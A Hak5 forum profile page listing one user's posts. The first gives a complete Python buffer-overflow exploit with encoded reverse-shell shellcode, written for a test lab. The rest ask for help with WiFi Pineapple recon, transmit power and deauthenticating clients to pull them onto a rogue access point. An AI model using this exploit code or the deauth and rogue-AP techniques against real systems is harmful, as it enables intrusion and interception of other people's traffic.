About confuscious1080

  • Rank
    Hak5 Fan


  1. Hi, I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and I can get a reverse Meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However, when I attempt this in the test environment against the machine that I know is running the application on port 42424, I do not get the reverse shell. I have tried this with both x86 and x64 shellcode. If I test locally on the Kali machine I can crash the application, but again I also do not get a shell. My exploit code is below:

     #!/usr/bin/env python2
     import socket

     ServiceManagerIP = ""
     ServiceManagerPort = 42424

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((ServiceManagerIP, ServiceManagerPort))

     payload = "\xc3"*146  # Junk Bytes
     # 77E9F7DF
     payload += "\xDF\xF7\xE9\x77" + "\x90"*16
     # Shellcode to be executed by application
     payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
                 "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
                 "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
                 "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
                 "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
                 "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
                 "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
                 "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
                 "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
                 "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
                 "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
                 "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
                 "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
                 "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
                 "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
                 "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
                 "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
                 "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
                 "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
                 "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
                 "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
                 "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
                 "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
                 "\x35\x96\xaf\x2a\x36\xb3")

     s.send(payload+"\r\n")
     # Original read s.recv(len(msg)), but msg was never defined (NameError); read a fixed buffer instead
     data = s.recv(1024)
     s.recv(1024)
     s.close()
     print data
  2. Do you know where I can order this in the UK? I presume from the ALFA site, as shipping from the Hak5 store takes ages since it's coming from America.
  3. Oh, so this is what I needed, an actual amplifier lol. I just ordered two of the 7dBi Alfa antennas and they made no difference. I will also buy this additional amplifier as well.
  4. Ah okay, well I also followed the instructions and ran the TX power unlocker script, but it has not worked or upgraded the TX power at all for any interface.
  5. Checked my Free WiFi Access Point as well, the one that my clients will connect to, which I guess is the actual one that matters, and the signal strength for that is only 18 dBm. I live in the UK; could this be because of law restrictions that it has to be under 20 dBm??
  6. When I connect to the Management AP of my WiFi Pineapple, not the one configured for clients to connect to, I only have a signal strength of 26 dBm compared to my actual BT router access point, which is at 65 dBm. This is also with one of the Alfa 7dBi antennas connected up to the WiFi Pineapple.
  7. Ah yes, that makes sense that having a bigger antenna will not increase the chipset's output power for the device. Is there a way to increase this as well in Kali Linux? I've tried the whole iw reg thing with the command line, but I have my suspicions that it is not actually doing anything.
  8. My TX power is still 22 dBm as well on the wlan0 interface in Kali. Got the antenna working; how do I take advantage of the 7dBi that I have?
  9. Hi, I recently got one of these from eBay to go on my NANO Basic piece of kit. I noticed that they sell them on the Hak5 website as well. So I took off the basic antenna and put on the Alfa, ran the shell script to configure the Pineapple, got the site address, logged in, tried a recon scan and nothing at all; it could not scan. Is there something else I need to do to configure it? The antenna came with no drivers or anything; I thought I could just screw it on the Pineapple and I would be away.
  10. Nope, I just have the Pineapple, not the SD card that comes with it. Yeah, I think it's because I've run out of space on the Pineapple.
  11. I have my Android device connected up now and have been using DWALL on it. I am trying to use nmap, but for some reason the Pineapple will not install the dependencies.
  12. But I thought if you could deauth a MAC off of a router first, then you could get them to connect to you afterwards?
  13. So I have this set up at home at the moment, all configured, and changed the option that hides the access point in Networking. I have the PineAP daemon, logging, associations and everything running. Firstly, the recon tool does not seem that great at all; all the access points I scan for in recon are -98 signal strength. When I do finally manage to get a client to show with the access point, I try and deauth it. It says action completed successfully, then what? None of them seem to reconnect to my Pineapple Nano. I can definitely see my labelled network SSID in connections; when I try and connect to my own WiFi Nano it asks me for the key I made to log in. Surely it would do that for any clients trying to connect, ask for that key? Am I missing something here?
  14. Now I'm having a problem deauthing clients connected to the access points. Firstly, when I recon scan I get a few SSID access points but no clients, and when I try the deauth command on the access point it says please restart the Pineapple.